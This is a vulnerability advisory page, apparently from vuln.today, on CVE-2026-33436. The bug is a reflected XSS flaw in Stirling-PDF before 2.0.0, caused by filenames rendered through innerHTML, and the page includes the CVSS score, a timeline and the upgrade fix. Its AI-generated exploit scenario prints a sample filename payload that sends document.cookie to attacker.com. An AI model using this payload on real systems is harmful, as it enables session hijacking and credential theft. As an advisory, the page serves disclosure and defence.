Skip to main content

Stirling Pdf CVE-2026-33436

| EUVD-2026-23513 LOW
Improper Input Validation (CWE-20)
2026-04-17 GitHub_M
XSS File Upload Stirling Pdf
3.1
CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY
3.1 LOW
AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

6
Patch released
Apr 20, 2026 - 19:03 nvd
Patch available
Patch available
Apr 17, 2026 - 21:16 EUVD
Analysis Generated
Apr 17, 2026 - 21:11 vuln.today
EUVD ID Assigned
Apr 17, 2026 - 20:45 euvd
EUVD-2026-23513
Analysis Generated
Apr 17, 2026 - 20:45 vuln.today
CVE Published
Apr 17, 2026 - 20:29 nvd
LOW 3.1

DescriptionGitHub Advisory

Stirling-PDF is a locally hosted web application that facilitates various operations on PDF files. In versions prior to 2.0.0, file upload endpoints render user-supplied filenames directly into HTML using unsafe methods like innerHTML without sanitization. An attacker can craft a file with a malicious filename containing JavaScript that executes in the uploading user's browser context, resulting in reflected XSS. The issue affects numerous upload endpoints across the application. The issue has been fixed in version 2.0.0.

AnalysisAI

Reflected cross-site scripting (XSS) in Stirling-PDF versions before 2.0.0 allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by uploading a file with a malicious filename containing script code. The vulnerability affects multiple file upload endpoints that render user-supplied filenames directly into HTML via unsafe DOM manipulation methods without sanitization. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Social engineer victim
Delivery
Upload file with XSS payload filename
Exploit
Application renders filename in HTML
Execution
JavaScript executes in victim's browser
Impact
Exfiltrate session data or credentials
Sign in to reveal

Vulnerability AssessmentAI

Exploitation The vulnerability requires the victim to actively upload a file with a malicious filename through Stirling-PDF's web interface. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Despite the modest CVSS score of 3.1, this vulnerability presents limited real-world risk due to multiple mitigating factors embedded in the attack vector. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a file with a malicious filename such as 'report<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">.pdf' and tricks a legitimate Stirling-PDF user into uploading it via social engineering. When the application renders the filename in the upload confirmation or file list page using innerHTML, the embedded JavaScript executes in the victim's browser, exfiltrating session cookies or performing actions on behalf of the victim. …
Remediation Upgrade Stirling-PDF to version 2.0.0 or later, which fixes the unsafe filename rendering by implementing proper input sanitization and using safe DOM methods (textContent instead of innerHTML) or HTML entity encoding. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-33436 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy